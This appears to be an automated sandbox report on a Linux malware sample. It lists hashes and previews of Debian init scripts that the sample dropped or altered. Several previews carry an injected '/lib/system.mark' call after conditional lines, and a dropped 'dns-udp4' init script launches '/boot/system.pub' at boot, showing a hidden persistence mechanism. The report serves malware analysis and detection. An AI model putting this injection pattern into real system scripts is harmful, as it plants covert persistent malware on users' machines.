SSDEEP:	24:9lBie8ItKzeBcxlo8/z3ejhGJckS5gzjdJ5ZWkZg7zcOqb6:938yKzYcX/LshGJckS5gJ58kG7A9b6
MD5:	BDD323E45B8053AC9234F45E20BABD66
SHA1:	0141637CE3CE6E3401B3863FED8103F825427055
SHA-256:	44922CED598FFB90525BA2E3285418AE91C2788E4A3DEE0EEE1C3DBF8191AC96
SHA-512:	9BCD74E42D402FCA871BB0B7900821401FA5F229DE02D977D130A48D35BC088BAE03B8FE5D235EA3E1C0309B4B35DF069AA51F496BF8FD5406CDD4BCBCD7B12F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: console-setup.sh.# Required-Start: $remote_fs.# Required-Stop:.# Should-Start: console-screen kbd.# Default-Start: 2 3 4 5.# Default-Stop:.# X-Interactive: true.# Short-Description: Set console font and keymap.### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system.mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system.mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {.. if [ "$1" -eq 0 ]; then./lib/system.mark.. echo done... else.. echo failed... fi. }. fi. log_action_begin_msg "Setting up console font and keymap". if /li

/etc/init.d/cron

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3111
Entropy (8bit):	4.912604701068792
Encrypted:	false
SSDEEP:	48:5PMic6MicW4dJIrcz8WD23fK2LAb38ClAATDuMoZisTdDKoA3gHMLf:5E3s4dJWRWD23y2LgsYDT6MnidD/A3gU
MD5:	C47C5241A33BA37060C9A1A58C167E9E
SHA1:	9ED529B5EFC37F87EF208A43161D198838600310
SHA-256:	6EECCBE60DB542164C6E4F3ADB1291DF01D1502F9A12531D2CCD7A95A88F1712
SHA-512:	B01E7002EF994DF92650E51AA40438F636A8EEE1ABD5E6B6E65F64791CB78C49F412DDD29F82D5840ABDD917CF008713C7D2FBA0E929656ECF713DBB71B255AF
Malicious:	true
Preview:	#!/bin/sh.# Start/stop the cron daemon..#.### BEGIN INIT INFO.# Provides: cron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Should-Start: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Should-Stop: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Regular background program processing daemon.# Description: cron is a standard UNIX program that runs user-specified .# programs at periodic scheduled times. vixie cron adds a .# number of features to the basic UNIX cron, including better.# security and more powerful configuration options..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DESC="cron daemon".NAME=cron.DAEMON=/usr/sbin/cron.PIDFILE=/var/run/crond.pid.SCRIPTNAME=/etc/init.d/"$NAME"..test -f $DAEMON \|\| exit 0... /lib/lsb/init-functions..[ -r /etc/default/cr

/etc/init.d/cryptdisks

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	955
Entropy (8bit):	5.163687656510361
Encrypted:	false
SSDEEP:	12:aiy4BTty5r2MVOc4qVp1b7NBq2dS1uaqLgcIcrEcrmjcdpEMyuDHkkGKErIKDq7p:aiVT5MQsL1bPq2MKicr/ZkVyKDpjQ
MD5:	F59810FCEAD6967D3484941B757C5D9F
SHA1:	8E78AB09A2E17C4662DE668D65A620CBC4F2A95A
SHA-256:	3ABA882AD020C66D4F94787BB8CA8CE3F1C40CE725B4A8471009B561C0A951D0
SHA-512:	E99CD55831661A71CADD479321623D42FA9E22F8417F812C9357D229D5D3A76EDDA65B97D9A71C00C741EE910335CA3966637C5C6F6D154E8373CA154893CC22
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks.# Required-Start: checkroot cryptdisks-early.# Required-Stop: umountroot cryptdisks-early.# Should-Start: udev mdadm-raid lvm2.# Should-Stop: udev mdadm-raid lvm2.# X-Start-Before: checkfs.# X-Stop-After: umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup remaining encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system.mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="remaining".DEFAULT_LOUD="yes"..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cryptdisks-early

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.162273569946851
Encrypted:	false
SSDEEP:	12:aiy2BTCZN2MVW4qVS5sNBq2dX9qLgcIcrEcrmZm2dpBdMyuDHkkGKErIKDq7URuL:ai/TTMkw5Mq2CBKYZkVyKDvjQ
MD5:	4D657844653E6118D801763C22C19937
SHA1:	6E7F91D90BAF86647698FA87FACD293CB345CF8B
SHA-256:	DF98C3C25E61F97881A20C39E5F44F544994FB3C56ACBBA6BE5F4BFEB6FD359E
SHA-512:	7915008586A4E3F57F8334E94F7A61E4FA3B51981AF2E0806B7AD2D9E0E6BBF8B321A3389D5A834EB73BF99957102A29DDF24841AA6D4E3354517A6668763CAA
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks-early.# Required-Start: checkroot.# Required-Stop: umountroot.# Should-Start: udev mdadm-raid.# Should-Stop: udev mdadm-raid.# X-Start-Before: lvm2.# X-Stop-After: lvm2 umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup early encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system.mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="early".DEFAULT_LOUD=""..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks-early {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cups

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2856
Entropy (8bit):	5.228297603931064
Encrypted:	false
SSDEEP:	48:76MLNMwmbAzAZVCoLqLVj1I6NH/qAh1UoAaYmUoG/FVv/FkG/UoG/FQRetsJ:7BWwmEMZVChVB7UoAaZUoGDvuG/UoGq/
MD5:	2A2270B6CC5B1BB95B8ED17ACC2C088E
SHA1:	E64F610A9E1145F5C930A7B2D1B31D9D301DF237
SHA-256:	A6854F423BD17C78AD8F61EDBED12417E1DE18CD8F35CB76295CE725CF888A99
SHA-512:	4D5A50E7EB4FB077574AD2B34C08D10270B5E5246A8C6D7D0CBFDDEC399093206C4D653C7AD6ACB0E211C037D5E4D45F5FC80DEA4CA8B5FB0E2A85C1759E9576
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups.# Required-Start: $syslog $remote_fs.# Required-Stop: $syslog $remote_fs.# Should-Start: $network avahi-daemon slapd nslcd.# Should-Stop: $network.# X-Start-Before: samba.# X-Stop-After: samba.# Default-Start: 2 3 4 5.# Default-Stop: 1.# Short-Description: CUPS Printing spooler and server.# Description: Manage the CUPS Printing spooler and server;.# make it's web interface accessible on http://localhost:631/.### END INIT INFO..# Author: Debian Printing Team <debian-printing@lists.debian.org>..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/cupsd.NAME=cupsd.PIDFILE=/run/cups/$NAME.pid.DESC="Common Unix Printing System".SCRIPTNAME=/etc/init.d/cups..unset TMPDIR..# Exit if the package is not installed.test -x $DAEMON \|\| exit 0..mkdir -p /run/cups/certs.[ -x /sbin/restorecon ] && /sbin/restorecon -R /run/cups..# Define LSB log_* functions..

/etc/init.d/cups-browsed

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1979
Entropy (8bit):	5.146376682341581
Encrypted:	false
SSDEEP:	48:7mU3mK7xpvyCKyhfPV5upSYf54v6YSBFQJvFn2b:7j3FpjhnV5upSYuv3ScJp2b
MD5:	DA422CE81DD723C1511C06DA133FC27A
SHA1:	BBC3D860F2A391DCA48430C7C683D101463FA364
SHA-256:	1F549EBA5DB1AECF858178F62437651FDF2BA032890C4E65D204262DCCBB6F8E
SHA-512:	A4D88E11ECDD83D280131E788E2610DDA68AABEFF73E54C877341A034689B182A0B6D52DE00E0AB0177D7373740F8CCB16EABF98E17BDA643F2ECEEE3BC985A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups-browsed.# Required-Start: $syslog $remote_fs $network $named $time.# Required-Stop: $syslog $remote_fs $network $named $time.# Should-Start: avahi-daemon.# Should-Stop: avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: cups-browsed - Make remote CUPS printers available locally.# Description: This daemon browses Bonjour broadcasts of shared remote CUPS.# printers and makes these printers available locally by creating.# local CUPS queues pointing to the remote queues. This replaces.# the CUPS browsing which was dropped in CUPS 1.6.1. For the end.# the behavior is the same as with the old CUPS broadcasting/.# browsing, but in the background the standard method for network.# service announcement and discovery, Bonjour, is used..### END INIT INFO..DAEMON=/usr/sbin/cups-browsed.NAME=cups-browsed.PIDFIL

/etc/init.d/dbus

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, Unicode text, UTF-8 text executable
Category:	dropped
Size (bytes):	3255
Entropy (8bit):	5.122590071157076
Encrypted:	false
SSDEEP:	96:9JOxb7pmQJ3sQmx+xZRGWoGUuK2gY5W7zTXmgI:9Jwf7XMSIr7nXmL
MD5:	E85B436BDC8D0D1FAB58603A43BD7F55
SHA1:	53A674DE137A91FF396048EF8F09B0F306397136
SHA-256:	0FD1F38334022C7D46F8F429E0461DE6A6F20AC6BB4CF2B3C0C6DF6E44C0E92F
SHA-512:	8E285B86DE44C4FDDA957F903C9656E777D1F13D713EA84F7EAD5566D4093155E4836281710C855F5092F4C3B0DD9E5F808ABBBCFDE36F0911C732A669476A5D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: dbus.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: D-Bus systemwide message bus.# Description: D-Bus is a simple interprocess messaging system, used.# for sending messages between applications..### END INIT INFO.# -- coding: utf-8 --.# Debian init.d script for D-BUS.# Copyright . 2003 Colin Walters <walters@debian.org>.# Copyright . 2005 Sjoerd Simons <sjoerd@debian.org>..set -e..DAEMON=/usr/bin/dbus-daemon.UUIDGEN=/usr/bin/dbus-uuidgen.UUIDGEN_OPTS=--ensure.NAME=dbus.DAEMONUSER=messagebus.PIDDIR=/var/run/dbus.PIDFILE=$PIDDIR/pid.DESC="system message bus"..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Source defaults file; edit that file to configure this script..PARAMS="".if [ -e /etc/default/dbus ]; then./lib/system.mark. . /etc/default/dbus.fi..create_machineid() {. # Create machine-id file. i

/etc/init.d/dns-udp4

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	168
Entropy (8bit):	5.03458455286979
Encrypted:	false
SSDEEP:	3:TKH/AnsKhWeftXWQfv+NjWRLQ6WYkREpFNF/ebzkRKVFOWSXKWRAIhQ4+:jsKhLtXpv+1W/a2eMJnKWmz
MD5:	2C9C7188232B53D595FD0541654BBCAC
SHA1:	7D0AAB87AD2A7663236C5A7251E9EFAB1C47437A
SHA-256:	C334828BE737392703EF01044BD122F47C9188E0443FC81413F1801486E0EE9F
SHA-512:	CC841292BF0A1AB588D701BC65AB199520209C82C3AD6038BC12AE7CF8537EDDDBD04E480F5CBF972A0731F64F531063ABEA2D1863E126B8C42C88960A2240C7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash.### BEGIN INIT INFO.#chkconfig: 2345 10 90.#description:system.pub.# Default-Start: 2 3 4 5.# Default-Stop:.### END INIT INFO./boot/system.pub.exit 0

/etc/init.d/gdm3

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3102
Entropy (8bit):	5.045804889605048
Encrypted:	false
SSDEEP:	48:78unF1gLpANlduwTebFGB8B4ndfPaHa59zqPN/UsCVADsZvOsFzmxOsFC2WtFji:7dnM1aV3B5dNQaVAGvoe2Wtc
MD5:	979319372C9DA2093D245E5755FF36A6
SHA1:	9B5DD36873636794D6AE07792E7D4D9DED2C2489
SHA-256:	28C4D5946FDE3F9F7A846DA9F2E59F6A5A62FCECA7A527205F67A02478528D59
SHA-512:	89C92D9C74421B4AC6CE6BC46E09859CB72D836B69BDFE144FC8AA83D990FF135070D86C0A1FE225D8DB8CEE8756B67ABE8F117AB247EC7930B8C5E5A967DF0F
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: gdm3.# Should-Start: console-screen dbus network-manager.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: GNOME Display Manager.# Description: Debian init script for the GNOME Display Manager.### END INIT INFO.#.# Author: Ryan Murray <rmurray@debian.org>.#.set -e..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/gdm3.PIDFILE=/var/run/gdm3.pid..test -x $DAEMON \|\| exit 0..if [ -r /etc/default/locale ]; then./lib/system.mark. . /etc/default/locale. export LANG LANGUAGE.fi... /lib/lsb/init-functions..# To start gdm even if it is not the default display manager, change.# HEED_DEFAULT_DISPLAY_MANAGER to "false.".HEED_DEFAULT_DISPLAY_MANAGER=true.DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager..activate_logind() {. # Try to dbus activate logind to avoid a race conditions if we are not. # runnin

/etc/init.d/hddtemp

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3163
Entropy (8bit):	5.2621448888959215
Encrypted:	false
SSDEEP:	48:ietQlU+vdYb5tM7yL7yi47yIrrFML6YRv50JDRABzNfuhCv8Z//UZJ7iu6052m3s:FtQlTd65tp6iNlLLRRQ4AsUk6o2mc
MD5:	A5AD832AE20F98254D6020CE444485FD
SHA1:	43408C17AB8386C42B777ED1E38A2C0D0D90FC7E
SHA-256:	52BF10B965E7EBBC956E2C1C10E8E4280278662428F634459607FDD51B4BBB97
SHA-512:	A54A09CD8B65D935F28B120AB5AD675FFB23447111D188F152F47FB5164B0D67A09BD25672F9967BABD74C19563F5F48FECE642E6D51ECC3D5088261FBFD8B1F
Malicious:	true
Preview:	#!/bin/sh.#.# skeleton example file to build /etc/init.d/ scripts..# This file should be used to construct scripts for /etc/init.d..#.# Written by Miquel van Smoorenburg <miquels@cistron.nl>..# Modified for Debian GNU/Linux.# by Ian Murdock <imurdock@gnu.ai.mit.edu>..#.# Version: @(#)skeleton 1.8 03-Mar-1998 miquels@cistron.nl.#..### BEGIN INIT INFO.# Provides: hddtemp.# Required-Start: $remote_fs $syslog $network.# Required-Stop: $remote_fs $syslog $network.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: disk temperature monitoring daemon.# Description: hddtemp is a disk temperature monitoring daemon.### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=hddtemp.DAEMON=/usr/sbin/$NAME.DESC="disk temperature monitoring daemon"..DISKS="/dev/hd[a-z] /dev/hd[a-z][a-z]".DISKS="$DISKS /dev/sd[a-z] /dev/sd[a-z][a-z]".DISKS="$DISKS

/etc/init.d/hwclock.sh

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3946
Entropy (8bit):	5.1533815522152295
Encrypted:	false
SSDEEP:	96:uYqy3be4txLsMwqTZLLFFT7aTfNvagXQwj5jNvaYXakeQz:VZbxtXFZPKTfNvawtjNva4n
MD5:	D79E755001A5DB9E20CEDB6C961025F2
SHA1:	EDC19EC928BF4DAD45DA256670D819453BB58AE8
SHA-256:	11069209E8BB5F1A4C1241C0639C07EA11B31E688A7C045936161CFBE5D8FEA2
SHA-512:	4BF748BD107D2C3340FD95E05FF58B1F1B60C5248C427F0764CD5E99C9EC0495608BC8D0052803714CE2B85E38F9DA03A092AD94E04AF29B345D4721607582A1
Malicious:	true
Preview:	#!/bin/sh.# hwclock.sh.Set and adjust the CMOS clock..#.# Version:.@(#)hwclock.sh 2.00 14-Dec-1998 miquels@cistron.nl.#.# Patches:.#..2000-01-30 Henrique M. Holschuh <hmh@rcm.org.br>.#.. - Minor cosmetic changes in an attempt to help new.#.. users notice something IS changing their clocks.#.. during startup/shutdown..#.. - Added comments to alert users of hwclock issues.#.. and discourage tampering without proper doc reading..# 2012-02-16 Roger Leigh <rleigh@debian.org>.# - Use the UTC/LOCAL setting in /etc/adjtime rather than.# the UTC setting in /etc/default/rcS. Additionally.# source /etc/default/hwclock to permit configuration...### BEGIN INIT INFO.# Provides: hwclock.# Required-Start: mountdevsubfs.# Required-Stop: mountdevsubfs.# Should-Stop: umountfs.# Default-Start: S.# X-Start-Before: checkroot.# Default-Stop: 0 6.# Short-Description: Sync hardware and system clock time..

/etc/init.d/irqbalance

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2707
Entropy (8bit):	4.999484335058729
Encrypted:	false
SSDEEP:	48:92ZPnWGmH6TMV5m11QU7dXCWQgxxsXuHtpyBMbtKxxsDBV/BkH5:92Z/WbZnm11LdyWFxKXuHtcBMbtKxKDc
MD5:	264DF0349838878E6A342635B4C6AAC6
SHA1:	FF2FC0C6330DACA16EAAA8FE91CB9B5A80EBA195
SHA-256:	CB5FA5A488AC0AE34080DAAA79AB37844BCBD9DFD374D6F9E1E9118245A8B3C7
SHA-512:	A187C35A0DC65DEA6591EE63954B84837A45B33F618BFD94AB8FCD030BC6828F9EE6B523158F5D26679BE651761C90378381D6CA0ACD55D5C477079DF8369AA0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: irqbalance.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: daemon to balance interrupts for SMP systems.### END INIT INFO.# irqbalance init script.# August 2003.# Eric Dorland..# Based on spamassassin init script..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/irqbalance.NAME=irqbalance.SNAME=irqbalance.DESC="SMP IRQ Balancer".PIDFILE="/run/$NAME.pid".PNAME="irqbalance".DOPTIONS=""..# Defaults - don't touch, edit /etc/default/.OPTIONS=""..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..test -f /etc/default/irqbalance && . /etc/default/irqbalance..# Beware: irqbalance tries to read and handle environment variables.# directly itself, but since start-stop-daemon clears the env.# we convert the variables to commandline arguments here....# (Note: in the daemon an option is enabled even if its set to.# e.g. the empty strin

/etc/init.d/iscsid

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1555
Entropy (8bit):	4.973705475535796
Encrypted:	false
SSDEEP:	24:2Xx/YpMr8MICUV7OlfrDNhay+HNCNBlH3U8lrQ5l8u4uuzG:MpuMAMICu7OlN+UBlH3U8lc/ZWzG
MD5:	17D9A0A3EA1CD82B2A6A20441C80F070
SHA1:	620A0F1B6910A8599B70373E1395E7C72D31DFD1
SHA-256:	8E41D01C9F88FCA987C6F56E3BF127AB5A9B2D151AC688748B4E68318701BF5C
SHA-512:	0DCF1BFA3B51D299B5D3F581CE6AF6B85B95806CC4854EE16451F852AD85C3733A8AC9D1FD887CE01C77B926F762787913D4A8BC19DF7C0260D9E75B6DA5AB25
Malicious:	true
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: iscsid.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: iSCSI initiator daemon (iscsid).# Description: The iSCSI initiator daemon takes care of.# monitoring iSCSI connections to targets. It is.# also the daemon providing the interface for the.# iscisadm tool to talk to when administering iSCSI.# connections..### END INIT INFO..# Author: Christian Seiler <christian@iwakd.de>..DESC="iSCSI initiator daemon".DAEMON=/sbin/iscsid.PIDFILE=/run/iscsid.pid.OMITDIR=/run/sendsigs.omit.d..do_start_prepare() {..if ! /lib/open-iscsi/startup-chec

/etc/init.d/keyboard-setup.sh

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1548
Entropy (8bit):	4.312093274159983
Encrypted:	false
SSDEEP:	48:9XfgD1yzyKzYcX/LshGJckS5MJAu8kGh5A9b6:9YQXC/w0SO
MD5:	4C516D25550878CE2CE024B6E97105DB
SHA1:	812E84ACA9890069BF1DBDEF175789DB8792F63D
SHA-256:	DE554C11A0C59B7354F88FD864DDFE7AE79BF3086319418BB27022B155693D85
SHA-512:	608967AF4BB7490885EA7E8EA8C5CFE2D38A7581FD3E9FE153793414063AC85079D1F3AA530650DF2D1ED47F7EA14A0D1BB38CA1F2F90627B03195D877F69335
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: keyboard-setup.sh.# Required-Start: mountkernfs.# Required-Stop:.# X-Start-Before: checkroot.# Default-Start: S.# Default-Stop:.# X-Interactive: true.# Short-Description: Set the console keyboard layout.# Description: Set the console keyboard as early as possible.# so during the file systems checks the administrator.# can interact. At this stage of the boot process.# only the ASCII symbols are supported..### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system.mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system.mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {..

/etc/init.d/kmod

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2164
Entropy (8bit):	4.911228479541638
Encrypted:	false
SSDEEP:	24:+mUxLADBzBQYDMAKjqg3UlfbrMZC/tCYJGMsMHwDa1rig/re4NAGg0clXd:l/dtQYxKjRQfbF/oYJbJQAri6KYG
MD5:	17D2C5E15246E822C28D957F063D1A16
SHA1:	387E38EC5877238778209A18EA0D930709E7A603
SHA-256:	25B762063EFF997BB4FFA75852E3E26F08BA0419C341452BA86F17F6734A9448
SHA-512:	0CC8B7A4D72E05C3F4676B6DD84CF25A660E9E9821D367ACF0D3EE56461EC57441A317389F04A5D0B74415495A499F73FCC968B6A57134A92768D43395E86EBA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: kmod.# Required-Start: .# Required-Stop: .# Should-Start: checkroot.# Should-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: Load the modules listed in /etc/modules..# Description: Load the modules listed in /etc/modules..### END INIT INFO..# Silently exit if the kernel does not support modules..[ -f /proc/modules ] \|\| exit 0.[ -x /sbin/modprobe ] \|\| exit 0..[ -f /etc/default/rcS ] && . /etc/default/rcS.. /lib/lsb/init-functions..PATH='/sbin:/bin'..case "$1" in. start). ;;.. stop\|restart\|reload\|force-reload). log_warning_msg "Action '$1' is meaningless for this init script". exit 0. ;;.. *). log_success_msg "Usage: $0 start". exit 1.esac..load_module() {. local module args. module="$1". args="$2".. if [ "$VERBOSE" != no ]; then./lib/system.mark. log_action_msg "Loading kernel module $module". modprobe $module $args \|\| true. else. modprobe $module $args > /dev/null 2>&1 \|\| t

/etc/init.d/lightdm

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3534
Entropy (8bit):	5.284950933277381
Encrypted:	false
SSDEEP:	48:fbmo8vyUjH3J+cNrWId4KF9wDeXAr/FI/F7R7cJ0IBnrd/g1ZsbHaX1Z4td/Wzvx:d8z3J+cNiRFSzGhJHyUDuxTDld
MD5:	8134B3B7E43D4BBE6C1F3E7C7C73A7ED
SHA1:	156CCD1CF7176156A0AD84CDEB5B53868C81712F
SHA-256:	379A79FE27830ACAE74486161F85FD54A2CC176FEB57D6E48B988147A994403B
SHA-512:	7604BFF7FE0AE3CDFF0BE20F2E2CD84BA854EBB35829F6CC6EE6837E91F2F0347CB7E86CF831A1C524F6BC80CC9F34185E89F580A2F0D9F42364E5FC00E78960
Malicious:	true
Preview:	#!/bin/sh..# Largely adapted from xdm's init script:.# Copyright 1998-2002, 2004, 2005 Branden Robinson <branden@debian.org>..# Copyright 2006 Eugene Konev <ejka@imfi.kspu.ru>.#.# This is free software; you may redistribute it and/or modify.# it under the terms of the GNU General Public License as.# published by the Free Software Foundation; either version 2,.# or (at your option) any later version..#.# This is distributed in the hope that it will be useful, but.# WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License with.# the Debian operating system, in /usr/share/common-licenses/GPL; if.# not, write to the Free Software Foundation, Inc., 51 Franklin Street, .# Fifth Floor, Boston, MA 02110-1301, USA...### BEGIN INIT INFO.# Provides: lightdm.# Required-Start: $local_fs $remote_fs dbus.# R

/etc/init.d/lm-sensors

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	901
Entropy (8bit):	5.104600839303824
Encrypted:	false
SSDEEP:	12:1CpBMHQHf7Wc9rlVYhRwDyh0QvsQoiXmH0+QhKDydO6aock1j6yLRujvljn:1i4WyM/Iwfi2Hjq13O
MD5:	4F5481561C2CB414FA79507BA03FDEF7
SHA1:	974F6AE6CE96EDBFA6247B47989CC4EA0D4C5CC6
SHA-256:	B8183CE4BF57A668EE504129E668E08DBE62FA0DDB7B7E42AABFF52FD7FBBB1D
SHA-512:	20B7254B833125FFD3449A402C534C9FF7C2A382C3407A35DC22A48B17352D7EFD767FF6A1C0A14FE8A70C2CCDED993A0695AC24D086036340267F4DA051C146
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: lm-sensors.# Required-Start: $remote_fs.# Required-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: lm-sensors.# Description: hardware health monitoring.### END INIT INFO... /lib/lsb/init-functions..[ -f /etc/default/rcS ] && . /etc/default/rcS.PATH=/bin:/usr/bin:/sbin:/usr/sbin.PROGRAM=/usr/bin/sensors..test -x $PROGRAM \|\| exit 0..case "$1" in. start)..log_action_begin_msg "Setting sensors limits"..if [ "$VERBOSE" = "no" ]; then./lib/system.mark.../usr/bin/sensors -s 1> /dev/null 2> /dev/null.../usr/bin/sensors 1> /dev/null 2> /dev/null..else.../usr/bin/sensors -s.../usr/bin/sensors > /dev/null..fi..log_action_end_msg 0..;;. stop)..;;. force-reload\|restart)..$0 start..;;. status)..exit 0..;;. *)..log_success_msg "Usage: /etc/init.d/lm-sensors {start\|stop\|restart\|force-reload\|status}"..exit 1.esac..exit 0..

/etc/init.d/lvm2-lvmpolld

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	604
Entropy (8bit):	5.317046519159889
Encrypted:	false
SSDEEP:	12:wdRDNeBuYryMmCU33VLBa5kI5GKq9XquaZ+w2Cj/:2Xx/lti9OXylj/
MD5:	1BB719CD6C1AFE11FFAA22E457222B8B
SHA1:	8C6D68B8CFD06AD81813E9568F61C029F12D258A
SHA-256:	282EC5B6FC5F91FD0F569B1B84FA5DBA6C46173479A2A8F2F3B38A6DE6F570AF
SHA-512:	23015D67D978FA0C37E305E57D74DE0DA8C4E78436E3D0C640C52C355CB301A25799898C722FD6BDACF6BF85DE0A0E590CBC8C6624DD86D39AD59800BD6491E7
Malicious:	true
